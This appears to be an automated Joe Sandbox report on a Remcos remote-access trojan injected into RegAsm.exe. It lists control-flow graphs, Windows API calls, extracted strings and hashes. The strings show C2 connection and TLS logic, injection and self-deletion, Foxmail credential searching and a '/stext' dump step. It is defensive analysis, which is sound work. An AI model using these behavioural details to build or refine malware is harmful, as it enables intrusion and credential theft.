                            control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 100 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->100 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e-40ec45 call 40d0a4 70->80 79->80 99 40ec27-40ec3d call 401fab call 4139e4 79->99 89 40ec47-40ec49 80->89 90 40ec4e-40ec55 80->90 93 40ef2c 89->93 94 40ec57 90->94 95 40ec59-40ec65 call 41b354 90->95 93->49 94->95 105 40ec67-40ec69 95->105 106 40ec6e-40ec72 95->106 99->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 100->126 105->106 108 40ecb1-40ecc4 call 401e65 call 401fab 106->108 109 40ec74 call 407751 106->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 141 40ec9c-40eca2 120->141 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 148 40ecac call 40729b 144->148 148->108 177->178 204 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->204 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->234 183 40ee4a-40ee54 call 409092 181->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->184 190 40ee59-40ee7d call 40247c call 434829 183->190 184->190 212 40ee8c 190->212 213 40ee7f-40ee8a call 436f10 190->213 204->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 272 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->272 287 40f017-40f019 234->287 288 40effc 234->288 272->234 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 272->286 286->234 306 40ef2a 286->306 291 40f01b-40f01d 287->291 292 40f01f 287->292 290 40effe-40f015 call 41ce2c CreateThread 288->290 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 291->290 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->93 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 357 40f194-40f1a7 call 401e65 call 401fab 346->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->358 367 40f207-40f21a call 401e65 call 401fab 357->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->368 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 406 40f293-40f29d CreateThread 403->406 407 40f29f-40f2a6 403->407 406->407 408 40f2b4-40f2bb 407->408 409 40f2a8-40f2b2 CreateThread 407->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                            APIs
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                              • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                              • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                              • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                              • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                            • String ID: 0oS$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-OT0ZCG$Software\$User$`.S$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                            • API String ID: 2830904901-805712278
                            • Opcode ID: ae36aec61df52f9742e213b4f1a912637bb447fff95ae5c47cb17c6409edc614
                            • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                            • Opcode Fuzzy Hash: ae36aec61df52f9742e213b4f1a912637bb447fff95ae5c47cb17c6409edc614
                            • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 494 414f65-414fad call 4020df call 41b944 call 4020df call 401e65 call 401fab call 43bb2c 507 414fbc-415008 call 402093 call 401e65 call 4020f6 call 41beac call 40489e call 401e65 call 40b9f8 494->507 508 414faf-414fb6 Sleep 494->508 523 41500a-415079 call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 507->523 524 41507c-415117 call 402093 call 401e65 call 4020f6 call 41beac call 401e65 * 2 call 406c59 call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 507->524 508->507 523->524 577 415127-41512e 524->577 578 415119-415125 524->578 579 415133-4151c5 call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414f24 577->579 578->579 606 415210-41521e call 40482d 579->606 607 4151c7-41520b WSAGetLastError call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 579->607 613 415220-415246 call 402093 * 2 call 41b580 606->613 614 41524b-415260 call 404f51 call 4048c8 606->614 630 415ade-415af0 call 404e26 call 4021fa 607->630 613->630 629 415266-4153b9 call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b580 call 401fd8 * 4 call 41b871 call 4145f8 call 409097 call 441ed1 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 413733 614->629 614->630 694 4153bb-4153c8 call 405aa6 629->694 695 4153cd-4153f4 call 401fab call 4135e1 629->695 643 415af2-415b12 call 401e65 call 401fab call 43bb2c Sleep 630->643 644 415b18-415b20 call 401e8d 630->644 643->644 644->524 694->695 701 4153f6-4153f8 695->701 702 4153fb-4154c0 call 40417e call 40ddc4 call 41bcd3 call 41bdaf call 41bc1f call 401e65 GetTickCount call 41bc1f call 41bb77 call 41bc1f * 2 call 41bb27 695->702 701->702 725 4154c5-415a51 call 41bdaf * 5 call 40f90c call 41bdaf call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 702->725 948 415a53-415a5a 725->948 949 415a65-415a6c 725->949 948->949 950 415a5c-415a5e 948->950 951 415a78-415aaa call 405a6b call 402093 * 2 call 41b580 949->951 952 415a6e-415a73 call 40b08c 949->952 950->949 963 415aac-415ab8 CreateThread 951->963 964 415abe-415ad9 call 401fd8 * 2 call 401f09 951->964 952->951 963->964 964->630
                            APIs
                            • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414FB6
                            • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                            • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$ErrorLastLocalTime
                            • String ID: | $%I64u$0oS$5.1.1 Pro$8SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-OT0ZCG$TLS Off$TLS On $`.S$dMG$hlight$name$NG$NG$PG$PG$PG
                            • API String ID: 524882891-2344609257
                            • Opcode ID: 79288536e4165c6157248710647f71f23426609ae1f89b193eceedb6e23a3c7b
                            • Instruction ID: 9dea7478a43989413a8a7de35667e348ffff56bc780dedce428272fd6db975fd
                            • Opcode Fuzzy Hash: 79288536e4165c6157248710647f71f23426609ae1f89b193eceedb6e23a3c7b
                            • Instruction Fuzzy Hash: B8526C31A001155ACB18F732DD96AFEB3769F90348F5044BFE40A761E2EF781E858A9D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 971 412aef-412b38 GetModuleFileNameW call 4020df * 3 978 412b3a-412bc4 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 call 41ba09 call 401fab call 40da23 call 401fd8 971->978 1003 412bc6-412c56 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 978->1003 1026 412c66 1003->1026 1027 412c58-412c60 Sleep 1003->1027 1028 412c68-412cf8 call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1026->1028 1027->1003 1027->1026 1051 412d08 1028->1051 1052 412cfa-412d02 Sleep 1028->1052 1053 412d0a-412d9a call 401fab call 40417e call 4042fc call 40431d call 403014 call 401f04 call 4185a3 call 401f09 * 4 1051->1053 1052->1028 1052->1051 1076 412daa-412dcf 1053->1076 1077 412d9c-412da4 Sleep 1053->1077 1078 412dd3-412def call 401f04 call 41c516 1076->1078 1077->1053 1077->1076 1083 412df1-412e00 call 401f04 DeleteFileW 1078->1083 1084 412e06-412e22 call 401f04 call 41c516 1078->1084 1083->1084 1091 412e24-412e3d call 401f04 DeleteFileW 1084->1091 1092 412e3f 1084->1092 1093 412e43-412e5f call 401f04 call 41c516 1091->1093 1092->1093 1100 412e61-412e73 call 401f04 DeleteFileW 1093->1100 1101 412e79-412e7b 1093->1101 1100->1101 1103 412e88-412e93 Sleep 1101->1103 1104 412e7d-412e7f 1101->1104 1103->1078 1107 412e99-412eab call 406b63 1103->1107 1104->1103 1106 412e81-412e86 1104->1106 1106->1103 1106->1107 1110 412f01-412f20 call 401f09 * 3 1107->1110 1111 412ead-412ebb call 406b63 1107->1111 1122 412f25-412f5e call 40b93f call 401f04 call 4020f6 call 413268 1110->1122 1111->1110 1117 412ebd-412ecb call 406b63 1111->1117 1117->1110 1123 412ecd-412ef9 Sleep call 401f09 * 3 1117->1123 1138 412f63-412f89 call 401f09 call 405b05 1122->1138 1123->978 1137 412eff 1123->1137 1137->1122 1143 4130e3-4131dc call 41bdaf call 402f31 call 402f10 * 6 call 402ea1 call 404aa1 call 401fd8 * 7 1138->1143 1144 412f8f-4130de call 41bdaf call 41bc1f call 402f31 call 402f10 * 6 call 402ea1 call 402f10 call 402ea1 call 404aa1 call 401fd8 * 10 1138->1144 1213 4131e0-413267 call 401fd8 call 401f09 call 401fd8 * 9 1143->1213 1144->1213
                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                              • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,638E1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                              • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                            • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                            • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                            • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                            • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                            • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                            • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                            • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                            • Sleep.KERNEL32(00000064), ref: 00412ECF
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                            • String ID: /stext "$0TG$0TG$NG$NG
                            • API String ID: 1223786279-2576077980
                            • Opcode ID: 5f6935a44d2555e3a9d5795660cee6edaaf8ceb71c721b5c00cde1a7094d04b6
                            • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                            • Opcode Fuzzy Hash: 5f6935a44d2555e3a9d5795660cee6edaaf8ceb71c721b5c00cde1a7094d04b6
                            • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A

                            Control-flow Graph

                            APIs
                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                              • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                              • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                              • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                              • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                              • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                            • lstrlenW.KERNEL32(?), ref: 100014C5
                            • lstrlenW.KERNEL32(?), ref: 100014E0
                            • lstrlenW.KERNEL32(?,?), ref: 1000150F
                            • lstrcatW.KERNEL32(00000000), ref: 10001521
                            • lstrlenW.KERNEL32(?,?), ref: 10001547
                            • lstrcatW.KERNEL32(00000000), ref: 10001553
                            • lstrlenW.KERNEL32(?,?), ref: 10001579
                            • lstrcatW.KERNEL32(00000000), ref: 10001585
                            • lstrlenW.KERNEL32(?,?), ref: 100015AB
                            • lstrcatW.KERNEL32(00000000), ref: 100015B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                            • String ID: )$Foxmail$ProgramFiles
                            • API String ID: 672098462-2938083778
                            • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                            • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                            • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                            • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1286 414dc1-414dfd 1287 414e03-414e18 GetSystemDirectoryA 1286->1287 1288 414f18-414f23 1286->1288 1289 414f0e 1287->1289 1290 414e1e-414e6a call 441a8e call 441ae8 LoadLibraryA 1287->1290 1289->1288 1295 414e81-414ebb call 441a8e call 441ae8 LoadLibraryA 1290->1295 1296 414e6c-414e76 GetProcAddress 1290->1296 1309 414f0a-414f0d 1295->1309 1310 414ebd-414ec7 GetProcAddress 1295->1310 1297 414e78-414e7b FreeLibrary 1296->1297 1298 414e7d-414e7f 1296->1298 1297->1298 1298->1295 1300 414ed2 1298->1300 1302 414ed4-414ee5 GetProcAddress 1300->1302 1304 414ee7-414eeb 1302->1304 1305 414eef-414ef2 FreeLibrary 1302->1305 1304->1302 1307 414eed 1304->1307 1308 414ef4-414ef6 1305->1308 1307->1308 1308->1309 1311 414ef8-414f08 1308->1311 1309->1289 1312 414ec9-414ecc FreeLibrary 1310->1312 1313 414ece-414ed0 1310->1313 1311->1309 1311->1311 1312->1313 1313->1300 1313->1309
                            APIs
                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                            • LoadLibraryA.KERNEL32(?), ref: 00414E52
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                            • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                            • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                            • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                            • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressFreeProc$Load$DirectorySystem
                            • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                            • API String ID: 2490988753-744132762
                            • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                            • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                            • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                            • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1314 4048c8-4048e8 connect 1315 404a1b-404a1f 1314->1315 1316 4048ee-4048f1 1314->1316 1319 404a21-404a2f WSAGetLastError 1315->1319 1320 404a97 1315->1320 1317 404a17-404a19 1316->1317 1318 4048f7-4048fa 1316->1318 1321 404a99-404a9e 1317->1321 1322 404926-404930 call 420cf1 1318->1322 1323 4048fc-404923 call 40531e call 402093 call 41b580 1318->1323 1319->1320 1324 404a31-404a34 1319->1324 1320->1321 1336 404941-40494e call 420f20 1322->1336 1337 404932-40493c 1322->1337 1323->1322 1326 404a71-404a76 1324->1326 1327 404a36-404a6f call 41cb72 call 4052fd call 402093 call 41b580 call 401fd8 1324->1327 1329 404a7b-404a94 call 402093 * 2 call 41b580 1326->1329 1327->1320 1329->1320 1349 404950-404973 call 402093 * 2 call 41b580 1336->1349 1350 404987-404992 call 421ad1 1336->1350 1337->1329 1376 404976-404982 call 420d31 1349->1376 1361 4049c4-4049d1 call 420e97 1350->1361 1362 404994-4049c2 call 402093 * 2 call 41b580 call 421143 1350->1362 1372 4049d3-4049f6 call 402093 * 2 call 41b580 1361->1372 1373 4049f9-404a14 CreateEventW * 2 1361->1373 1362->1376 1372->1373 1373->1317 1376->1320
                            APIs
                            • connect.WS2_32(FFFFFFFF,020F4950,00000010), ref: 004048E0
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                            • WSAGetLastError.WS2_32 ref: 00404A21
                              • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEvent$ErrorLastLocalTimeconnect
                            • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                            • API String ID: 994465650-2151626615
                            • Opcode ID: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                            • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                            • Opcode Fuzzy Hash: 824217cee8cd65e2c4566ef3e2df31ee38e4afb75aaed780d8085e8039972954
                            • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                            Control-flow Graph

                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                            • CloseHandle.KERNEL32(?), ref: 00404E4C
                            • closesocket.WS2_32(000000FF), ref: 00404E5A
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                            • CloseHandle.KERNEL32(?), ref: 00404EBF
                            • CloseHandle.KERNEL32(?), ref: 00404EC4
                            • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                            • CloseHandle.KERNEL32(?), ref: 00404ED6
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                            • String ID:
                            • API String ID: 3658366068-0
